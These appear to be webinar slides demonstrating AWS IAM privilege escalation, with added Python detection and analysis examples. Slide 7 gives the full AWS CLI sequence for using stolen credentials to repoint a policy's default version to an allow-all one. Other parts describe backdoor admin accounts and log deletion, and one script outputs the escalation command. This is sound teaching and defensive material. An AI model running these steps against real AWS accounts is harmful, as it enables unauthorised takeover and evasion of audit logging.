
IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM (Webinar)


Slides from a webinar conducted on Star Wars Day, 2021.

The webinar was focused on a demo of a misconfigured AWS IAM policy that allows an apparently low-privileged user to gain administrative privileges within the AWS account.


May 06, 2021




  1. IAM Bad: Privilege Escalation using Misconfigured Policies in AWS IAM

     Riyaz Walikar | Co-Founder - Kloudle | [email protected]
     May the 4th 2021 – 8:00 AM PDT (8:30 PM IST)
  2. Riyaz Walikar
     Co-founder & Chief Breaker of Things @ Kloudle Inc.
     Twitter: @riyazwalikar, Blog: https://ibreak.software
     • Over a decade of experience in breaking web & mobile apps, networks, wireless, cloud and most recently containers and Kubernetes
     • Have led Product Security and Consulting teams at Citrix and PwC SDC in a past life and was the OffSec Lead at Appsecco before moving on to co-founding Kloudle
     • Have multiple certifications as a result of my learning curve over the years, including CKA, CKAD, OSCP, CREST etc. (also, because they look cool on LinkedIn ☺)
     • Speaker at multiple cons, co-author, trainer, security evangelist with a short attention span and attracted to all things shiny
  3. What is the webinar about?
     • What is an AWS IAM policy?
     • Common examples of a misconfigured or overly permissive policy
     • Demo of a misconfiguration within a policy that leads to privilege escalation
     • Q&A
  4. What is an AWS IAM Policy
     • A policy is an object in AWS that, when associated with an identity or resource, defines the permissions of that identity or resource.
     • AWS evaluates these policies when an IAM principal (user or role) makes a request.
     • Permissions in the policies determine whether the request is allowed or denied.
     • A customer managed policy is versioned (at most five versions exist at a time), and only the version marked as the default is evaluated; changing which version is the default changes the effective permissions of every principal the policy is attached to.
  5. Demo Assumptions and Goal
     • Because we are demonstrating privilege escalation, we work with the assumption that we have gained access to General Tarkin’s AWS credentials
     • These credentials appear to be non-privileged
     • Our aim is to exploit a misconfiguration in the user’s policy definition and gain access to the employee database for the Death Star
  6. Post privilege escalation?
     • With the kind of access you will get, explore what else is available within the AWS account
     • Attackers tend to focus on data theft/destruction and make an attempt to use resources for their own benefit (like crypto-mining) etc.
     • Some attackers create a shadow admin account and use this as a backdoor
     • To hide their traces within AWS, attackers may also remove AWS logs (CloudTrail, flow logs etc.)
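The behaviour on this slide is also what a defender should be alerting on. The following is an added example (not from the deck and not Kloudle tooling) that runs a small set of detection rules over constructed CloudTrail-style log lines: the policy-version change from the demo, the creation of a shadow admin user, and the disabling of a trail. The identity ARN, user names, trail name and timestamps are assumptions; the record fields (eventSource, eventName, userIdentity.arn, requestParameters) follow the CloudTrail record format. The call that stops a trail is itself a management event, so it still shows up in CloudTrail Event history, which is why the last rule works.

```python
import json
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Assumed identity of the compromised user (the deck does not give one).
ACTOR = "arn:aws:iam::123456789012:user/tarkin"
POLICY_ARN = "arn:aws:iam::123456789012:policy/TarkinDBReadOnly"  # assumed


def _rec(time: str, source: str, name: str, params: dict, actor: str = ACTOR) -> str:
    """Build one constructed CloudTrail-style record as a JSON log line."""
    return json.dumps({"eventTime": time, "eventSource": source, "eventName": name,
                       "userIdentity": {"arn": actor}, "requestParameters": params})


# Constructed log lines: the demo steps followed by the post-escalation
# behaviour described on the slide, plus one benign self-service event.
LOG_LINES = [
    _rec("2021-05-04T15:00:10Z", "iam.amazonaws.com", "GetPolicyVersion",
         {"policyArn": POLICY_ARN, "versionId": "v2"}),
    _rec("2021-05-04T15:00:42Z", "iam.amazonaws.com", "SetDefaultPolicyVersion",
         {"policyArn": POLICY_ARN, "versionId": "v2"}),
    _rec("2021-05-04T15:01:05Z", "rds.amazonaws.com", "DescribeDBInstances", {}),
    _rec("2021-05-04T15:03:11Z", "iam.amazonaws.com", "CreateUser", {"userName": "backup-svc"}),
    _rec("2021-05-04T15:03:20Z", "iam.amazonaws.com", "AttachUserPolicy",
         {"userName": "backup-svc",
          "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _rec("2021-05-04T15:03:31Z", "iam.amazonaws.com", "CreateAccessKey", {"userName": "backup-svc"}),
    _rec("2021-05-04T15:05:00Z", "cloudtrail.amazonaws.com", "StopLogging",
         {"name": "management-events"}),
    # A user rotating their own key is not a shadow-admin signal.
    _rec("2021-05-04T15:06:00Z", "iam.amazonaws.com", "CreateAccessKey", {"userName": "vader"},
         actor="arn:aws:iam::123456789012:user/vader"),
]

# Log-tampering API calls by service (eventSource -> eventName set).
LOG_TAMPER = {
    "cloudtrail.amazonaws.com": {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"},
    "ec2.amazonaws.com": {"DeleteFlowLogs"},
    "logs.amazonaws.com": {"DeleteLogGroup", "DeleteLogStream"},
}
# IAM calls used to stage a backdoor principal.
SHADOW_ADMIN = {"CreateUser", "CreateLoginProfile", "CreateAccessKey",
                "AttachUserPolicy", "PutUserPolicy", "AddUserToGroup"}


def classify(ev: dict) -> Optional[Tuple[str, str]]:
    """Return (category, detail) for a suspicious record, or None."""
    src, name = ev["eventSource"], ev["eventName"]
    params = ev.get("requestParameters") or {}
    actor = ev["userIdentity"]["arn"]
    if src == "iam.amazonaws.com" and name == "SetDefaultPolicyVersion":
        return ("escalation",
                f"default version of {params.get('policyArn')} set to {params.get('versionId')}")
    if src == "iam.amazonaws.com" and name in SHADOW_ADMIN:
        target = params.get("userName")
        if name == "AttachUserPolicy" and str(params.get("policyArn", "")).endswith(
                "policy/AdministratorAccess"):
            return ("shadow-admin", f"AdministratorAccess attached to {target}")
        # Acting on a different principal than yourself is the signal.
        if target and not actor.endswith(f"user/{target}"):
            return ("shadow-admin", f"{name} on another principal: {target}")
        return None
    if name in LOG_TAMPER.get(src, set()):
        return ("log-tamper", f"{name} on {params.get('name') or params}")
    return None


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Parse JSON log lines and collect findings in log order."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        hit = classify(ev)
        if hit:
            findings.append({"time": ev["eventTime"], "actor": ev["userIdentity"]["arn"],
                             "category": hit[0], "detail": hit[1]})
    return findings


def correlate(findings: List[Dict[str, str]]) -> List[str]:
    """Actors that escalated AND then persisted or tampered with logs."""
    by_actor = defaultdict(set)
    for f in findings:
        by_actor[f["actor"]].add(f["category"])
    return sorted(a for a, cats in by_actor.items()
                  if "escalation" in cats and cats & {"shadow-admin", "log-tamper"})


if __name__ == "__main__":
    for f in detect(LOG_LINES):
        print(f"{f['time']} {f['category']:12} {f['actor']}: {f['detail']}")
    print("correlated actors:", correlate(detect(LOG_LINES)))
```

Each rule on its own is noisy (administrators legitimately create users and repoint policy versions); the correlation step is what separates the chain on this slide from routine IAM administration.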
  7. Commands from the Demo

     # Initial attempt with the victim's credentials against the target database
     aws rds describe-db-instances --profile <victim-profile-name>
     # Identify the principal and its attached managed policies
     aws sts get-caller-identity --profile <victim-profile-name>
     aws iam list-attached-user-policies --user-name <victim-aws-user-name> --profile <victim-profile-name>
     # Read the policy, its current default version, and the list of all versions
     aws iam get-policy --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name>
     aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v6 --profile <victim-profile-name>
     aws iam list-policy-versions --policy-arn "<arn-value-of-policy>" --profile <victim-profile-name>
     # Inspect each non-default version for one with excessive permissions
     aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v1 --profile <victim-profile-name>
     aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v2 --profile <victim-profile-name>
     aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v4 --profile <victim-profile-name>
     aws iam get-policy-version --policy-arn "<arn-value-of-policy>" --version-id v5 --profile <victim-profile-name>
     # Make that version the default; the user's effective permissions change immediately
     aws iam set-default-policy-version --policy-arn "<arn-value-of-policy>" --version-id <version-with-excessive-privs> --profile <victim-profile-name>
     # Repeat the original request with the escalated permissions
     aws rds describe-db-instances --profile <victim-profile-name>
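The following is an added example (not from the deck and not Kloudle's tooling) that performs the same reasoning as the commands above offline, against the shape of data that `aws iam list-policy-versions` and `aws iam get-policy-version` return: it checks whether the version currently in force lets the principal call `iam:SetDefaultPolicyVersion` on its own policy, looks for a non-default version that is admin-equivalent, and lists the stale privileged versions a defender should delete. The policy ARN and the policy documents are constructed to mirror the demo. The evaluator is a simplified single-policy check (explicit Deny beats Allow, wildcards matched with fnmatch, Condition and NotAction ignored), not the full IAM evaluation logic.

```python
import fnmatch
from typing import Iterable, List, Optional

# Constructed to mirror the demo: v6 (the default) is narrow but lets the
# user repoint the policy; v2 is a leftover "allow everything" version.
POLICY_ARN = "arn:aws:iam::123456789012:policy/TarkinDBReadOnly"  # assumed ARN
VERSIONS = [
    {"VersionId": "v6", "IsDefaultVersion": True, "Document": {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*", "sts:GetCallerIdentity"],
             "Resource": "*"},
            {"Effect": "Allow", "Action": "iam:SetDefaultPolicyVersion",
             "Resource": POLICY_ARN},
        ]}},
    {"VersionId": "v5", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "rds:Describe*", "Resource": "*"}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
]

# A version that allows all of these on any resource can mint a shadow admin,
# so it is treated as admin-equivalent here.
ADMIN_PROBES = ("iam:CreateUser", "iam:AttachUserPolicy", "iam:CreateAccessKey")


def _as_list(value) -> list:
    """IAM lets Action/Resource be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def policy_allows(document: dict, action: str, resource: str = "*") -> bool:
    """Simplified single-policy evaluation: explicit Deny wins, else any
    matching Allow. Action matching is case-insensitive with wildcards."""
    allowed = False
    for stmt in _as_list(document.get("Statement", [])):
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        resources = _as_list(stmt.get("Resource", []))
        if not any(fnmatch.fnmatchcase(action.lower(), a) for a in actions):
            continue
        if not any(fnmatch.fnmatchcase(resource, r) for r in resources):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


def is_admin_equivalent(document: dict) -> bool:
    return all(policy_allows(document, a, "*") for a in ADMIN_PROBES)


def find_escalation(policy_arn: str, versions: Iterable[dict]) -> Optional[dict]:
    """Reproduce the demo's reasoning: only the default version is in force,
    so check that it permits repointing the policy, then hunt for a
    non-default version worth repointing to."""
    versions = list(versions)
    default = next((v for v in versions if v["IsDefaultVersion"]), None)
    if default is None:
        return None
    if not policy_allows(default["Document"], "iam:SetDefaultPolicyVersion", policy_arn):
        return None
    for v in versions:
        if v["IsDefaultVersion"] or not is_admin_equivalent(v["Document"]):
            continue
        return {"from": default["VersionId"], "to": v["VersionId"],
                "command": (f'aws iam set-default-policy-version '
                            f'--policy-arn "{policy_arn}" --version-id {v["VersionId"]}')}
    return None


def stale_privileged_versions(versions: Iterable[dict]) -> List[str]:
    """Defender's view: non-default versions that are admin-equivalent and
    should be removed with `aws iam delete-policy-version`."""
    return [v["VersionId"] for v in versions
            if not v["IsDefaultVersion"] and is_admin_equivalent(v["Document"])]


if __name__ == "__main__":
    print("escalation:", find_escalation(POLICY_ARN, VERSIONS))
    print("stale privileged versions:", stale_privileged_versions(VERSIONS))
```

Two remediation points follow from the check: the fix is not only to remove `iam:SetDefaultPolicyVersion` (and `iam:CreatePolicyVersion`) from non-admin principals, but also to delete old versions that still carry broad permissions, since every retained version is one API call away from becoming the effective one.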